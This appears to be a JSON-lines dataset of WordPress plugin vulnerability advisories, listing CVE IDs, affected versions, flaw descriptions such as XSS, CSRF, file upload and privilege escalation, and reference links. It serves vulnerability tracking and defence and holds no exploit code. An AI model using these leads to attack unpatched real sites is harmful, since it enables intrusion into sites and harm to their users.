{"CVE_ID":"CVE-2023-4311","slug":"vrm360","versionImpact":"1.2.1","description":"The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21950116-1a69-4848-9da0-e912096c0fce\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21950116-1a69-4848-9da0-e912096c0fce\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0767","slug":"envo-elementor-for-woocommerce","versionImpact":"1.4.4","description":"The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.4. This is due to missing or incorrect nonce validation on the ajax_plugin_activation function. This makes it possible for unauthenticated attackers to activate arbitrary installed plugins via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca71257-05dc-43d5-8de6-faf0a2feab2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca71257-05dc-43d5-8de6-faf0a2feab2e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-elementor-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/include\\\/template-library.php#L332\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-elementor-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/include\\\/template-library.php#L332\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1291","slug":"brizy","versionImpact":"2.4.40","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown URL parameter in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb4b5165-35a6-47e9-922e-b244b0d006e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb4b5165-35a6-47e9-922e-b244b0d006e4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2959","slug":"svs-pricing-tables","versionImpact":"1.0.4","description":"The SVS Pricing Tables plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on the savePricingTable() function. This makes it possible for unauthenticated attackers to create and edit pricing tables via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78af081a-807b-48c8-82cd-f87fbef0fbe6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78af081a-807b-48c8-82cd-f87fbef0fbe6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svs-pricing-tables\\\/trunk\\\/app\\\/model\\\/svs_pt_model_main.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svs-pricing-tables\\\/trunk\\\/app\\\/model\\\/svs_pt_model_main.php#L61\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8728","slug":"easy-load-more","versionImpact":"1.0.3","description":"The Easy Load More plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d890e7a5-ea9f-40e5-9549-a6f26421b043?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d890e7a5-ea9f-40e5-9549-a6f26421b043?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-load-more\\\/trunk\\\/includes\\\/class-easy-load-more-settings.php#L268\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-load-more\\\/trunk\\\/includes\\\/class-easy-load-more-settings.php#L268\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12587","slug":"contact-form-master","versionImpact":"1.0.7","description":"The Contact Form Master  WordPress plugin through 1.0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7cb040f5-d154-48ea-a54e-80451054bad8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7cb040f5-d154-48ea-a54e-80451054bad8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12129","slug":"royal-core","versionImpact":"2.9.2","description":"The Royal Core plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'royal_restore_backup' function in all versions up to, and including, 2.9.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/hyperx-portfolio-for-freelancers-agencies\\\/13439786\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/hyperx-portfolio-for-freelancers-agencies\\\/13439786\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6ca0a45-cbb3-419b-a2fd-7427935524d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6ca0a45-cbb3-419b-a2fd-7427935524d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13565","slug":"simple-map-no-api","versionImpact":"1.9","description":"The Simple Map No Api plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-map-no-api\\\/trunk\\\/index.php#L242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-map-no-api\\\/trunk\\\/index.php#L242\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-map-no-api\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-map-no-api\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4d46c87-5c30-4251-941e-a5e52b5d0c9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4d46c87-5c30-4251-941e-a5e52b5d0c9f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4589","slug":"bon-toolkit","versionImpact":"1.3.2","description":"The Bon Toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bt-map' shortcode in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bon-toolkit\\\/trunk\\\/includes\\\/shortcodes.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bon-toolkit\\\/trunk\\\/includes\\\/shortcodes.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cafec05-c275-475d-91cf-ed65cd191b0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cafec05-c275-475d-91cf-ed65cd191b0e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5540","slug":"wp-easy-events","versionImpact":"4.1.0","description":"The Event RSVP and Simple Event Management Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'emd_mb_meta' shortcode in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easy-events\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easy-events\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f09ffc02-bfed-4aa3-a3d3-58e188b3e147?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f09ffc02-bfed-4aa3-a3d3-58e188b3e147?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7690","slug":"affiliate-plus","versionImpact":"1.3.2","description":"The Affiliate Plus plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.2. This is due to missing or incorrect nonce validation on the 'affiplus_settings' page. This makes it possible for unauthenticated attackers to perform an unauthorized action granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-plus\\\/trunk\\\/affiplus.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-plus\\\/trunk\\\/affiplus.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-plus\\\/trunk\\\/affipsettings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-plus\\\/trunk\\\/affipsettings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/affiliate-plus\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/affiliate-plus\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3fc6230-043f-4079-a82a-1b5d191dbf7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3fc6230-043f-4079-a82a-1b5d191dbf7d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0145","slug":"saan-world-clock","versionImpact":"1.8","description":"The Saan World Clock WordPress plugin through 1.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4e4b4a2-c7cb-42ce-9d5b-bd84efcbf54d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4e4b4a2-c7cb-42ce-9d5b-bd84efcbf54d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1910","slug":"getwid","versionImpact":"1.8.3","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to an insufficient capability check on the get_remote_templates function in versions up to, and including, 1.8.3. This makes it possible for authenticated attackers with subscriber-level permissions or above to flush the remote template cache. Cached template information can also be accessed via this endpoint but these are not considered sensitive as they are publicly accessible from the developer's site.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/tags\\\/1.8.3\\\/includes\\\/rest-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/tags\\\/1.8.3\\\/includes\\\/rest-api.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cd64ab0-007b-4778-9d92-06e530638fad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cd64ab0-007b-4778-9d92-06e530638fad?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3087","slug":"fluent-smtp","versionImpact":"2.2.4","description":"The FluentSMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 2.2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2935217\\\/fluent-smtp\\\/trunk\\\/app\\\/Services\\\/Mailer\\\/BaseHandler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2935217\\\/fluent-smtp\\\/trunk\\\/app\\\/Services\\\/Mailer\\\/BaseHandler.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa47a794-e5ce-491d-a10b-c7c5718aa853?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa47a794-e5ce-491d-a10b-c7c5718aa853?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2935217\\\/fluent-smtp\\\/trunk\\\/app\\\/Models\\\/Logger.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2935217\\\/fluent-smtp\\\/trunk\\\/app\\\/Models\\\/Logger.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5232","slug":"font-awesome-more-icons","versionImpact":"3.5","description":"The Font Awesome More Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'icon' shortcode in versions up to, and including, 3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15947764-a070-4715-bd44-cb79b62ed59d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15947764-a070-4715-bd44-cb79b62ed59d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-more-icons\\\/tags\\\/3.5\\\/plugin.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-more-icons\\\/tags\\\/3.5\\\/plugin.php#L82\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0766","slug":"envo-elementor-for-woocommerce","versionImpact":"1.4.4","description":"The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the templates_ajax_request function in all versions up to, and including, 1.4.4. This makes it possible for subscribers and higher to create templates.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996c7433-dd82-4216-86b9-005f43c06c3a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996c7433-dd82-4216-86b9-005f43c06c3a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-elementor-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/include\\\/template-library.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-elementor-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/include\\\/template-library.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1237","slug":"header-footer-elementor","versionImpact":"1.6.24","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the flyout_layout attribute in all versions up to, and including, 1.6.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82644c46-205b-4005-bba8-6b3e45769639?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82644c46-205b-4005-bba8-6b3e45769639?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.24\\\/inc\\\/widgets-manager\\\/widgets\\\/class-navigation-menu.php#L1951\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.24\\\/inc\\\/widgets-manager\\\/widgets\\\/class-navigation-menu.php#L1951\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034938%40header-footer-elementor&new=3034938%40header-footer-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034938%40header-footer-elementor&new=3034938%40header-footer-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2958","slug":"svs-pricing-tables","versionImpact":"1.0.4","description":"The SVS Pricing Tables plugin for WordPress is vulnerable to Stored Cross-Site Scripting via pricing table settings in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/655b35a7-a532-4ceb-aa02-4a8192e6449d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/655b35a7-a532-4ceb-aa02-4a8192e6449d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svs-pricing-tables\\\/trunk\\\/app\\\/model\\\/svs_pt_model_main.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svs-pricing-tables\\\/trunk\\\/app\\\/model\\\/svs_pt_model_main.php#L61\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5224","slug":"cardoza-facebook-like-box","versionImpact":"4.0","description":"The Easy Social Like Box \u2013 Popup \u2013 Sidebar Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cardoza_facebook_like_box' shortcode in all versions up to, and including, 4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc22a8df-44be-477e-a3b6-67960bf442d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc22a8df-44be-477e-a3b6-67960bf442d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cardoza-facebook-like-box\\\/trunk\\\/cardoza_facebook_like_box.php#L839\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cardoza-facebook-like-box\\\/trunk\\\/cardoza_facebook_like_box.php#L839\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8727","slug":"dk-pdf","versionImpact":"1.9.6","description":"The DK PDF plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.9.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d71cdd64-7cd6-4b1a-ae8d-e9bf78e630c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d71cdd64-7cd6-4b1a-ae8d-e9bf78e630c7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dk-pdf\\\/trunk\\\/includes\\\/class-dkpdf-settings.php#L420\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dk-pdf\\\/trunk\\\/includes\\\/class-dkpdf-settings.php#L420\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12102","slug":"typer-core","versionImpact":"1.9.6","description":"The Typer Core plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.9.6 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/typer-core\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/typer-core\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de53b1d8-e38f-42c5-adfc-2b0ce8d6945b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de53b1d8-e38f-42c5-adfc-2b0ce8d6945b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13555","slug":"1-click-migration","versionImpact":"2.1","description":"The 1 Click WordPress Migration Plugin \u2013 100% FREE for a limited time plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1. This is due to missing or incorrect nonce validation on the cancel_actions() function. This makes it possible for unauthenticated attackers to cancel a triggered backup via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/1-click-migration\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/1-click-migration\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aee963fa-26b5-4bf0-b52f-095c67fb4834?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aee963fa-26b5-4bf0-b52f-095c67fb4834?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2881","slug":"developer-toolbar","versionImpact":"1.0.3","description":"The Developer Toolbar plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.3 through the publicly accessible phpinfo.php script. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/developer-toolbar\\\/trunk\\\/views\\\/phpinfo.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/developer-toolbar\\\/trunk\\\/views\\\/phpinfo.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/developer-toolbar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/developer-toolbar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e10ba37a-cd7d-4fc9-8b41-806fa3dc7785?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e10ba37a-cd7d-4fc9-8b41-806fa3dc7785?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4126","slug":"eg-series","versionImpact":"2.1.1","description":"The EG-Series plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [series] shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes in the shortcode_title function. This makes it possible for authenticated attackers - with contributor-level access and above, on sites with the Classic Editor plugin activated - to inject arbitrary JavaScript code in the titletag attribute that will execute whenever a user access an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eg-series\\\/trunk\\\/lib\\\/eg-plugin.inc.php#L546\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eg-series\\\/trunk\\\/lib\\\/eg-plugin.inc.php#L546\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab518a1b-304d-4b93-b807-65ef3941dd47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab518a1b-304d-4b93-b807-65ef3941dd47?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
